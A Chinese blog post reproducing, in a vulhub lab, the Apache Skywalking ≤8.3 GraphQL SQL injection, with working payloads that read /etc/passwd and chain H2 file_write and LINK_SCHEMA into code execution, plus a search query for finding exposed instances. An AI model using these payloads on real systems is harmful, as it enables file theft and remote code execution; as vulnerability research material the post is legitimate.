0x01 漏洞简述
Apache Skywalking 是专门为微服务架构和云原生架构系统而设计并且支持分布式链路追踪的APM系统。
在Apache Skywalking 8.3.0版本及以前的GraphQL接口中,存在一处H2 Database SQL注入漏洞。
0x02 漏洞影响版本
0x03 搜索语法及Exp
搜索语法如下:
http.favicon.hash:1929532064
漏洞Exp如下:
0x04 漏洞环境搭建
使用vulhub进行复现
访问8080端口即可查看Skywalking的页面。
0x05 漏洞复现
发送如下graphql查询。
POST /graphql HTTP/1.1Host: vul.zgao.top:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 405{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}
sqli注入读取系统文件:
将参数替换为如下sql语句读取系统敏感文件。
INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--
sqli_to_RCE
file_write写入evil类:
H2 是一个用 Java 开发的嵌入式数据库,它本身只是一个类库,即只有一个 jar 文件,可以直接嵌入到应用项目中。
file_write函数写入恶意类。
import java.io.IOException;public class evil {static {try {Runtime.getRuntime().exec("touch /tmp/success");} catch (IOException e) {e.printStackTrace();}}public static void main(String[] args) {}}
xxd将class转为16进制:
1,先把上面的java类编译为class。
2,将编译后的evil.class 转为16进制。
xxd -p -c 1000000 evil.class
INFORMATION_SCHEMA.USERS union all select file_write('cafebabe0000003200230a000800140a001500160800170a001500180700190a0005001a07001b07001c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b29560100083c636c696e69743e01000d537461636b4d61705461626c6507001901000a536f7572636546696c650100096576696c2e6a6176610c0009000a07001d0c001e001f010012746f756368202f746d702f737563636573730c002000210100136a6176612f696f2f494f457863657074696f6e0c0022000a0100046576696c0100106a6176612f6c616e672f4f626a6563740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000300010009000a0001000b0000001d00010001000000052ab70001b100000001000c000000060001000000030009000d000e0001000b000000190000000100000001b100000001000c0000000600010000000e0008000f000a0001000b0000004f0002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050002000c0000001600050000000600090009000c0007000d00080011000a00100000000700024c0700110400010012000000020013','evil.class'))a where 1=? or 1=? or 1=? --
INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','evil','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --
在命令执行生成的文件是生成在oap的容器中。
0x06 溯源排查
0x07 修复建议
2、将默认h2数据库替换为其它支持的数据库
往期推荐 ●●
// 1
// 2
// 3
// 4
原文始发于微信公众号(巡安似海):Apache Skywalking <=8.3 SQL注入漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论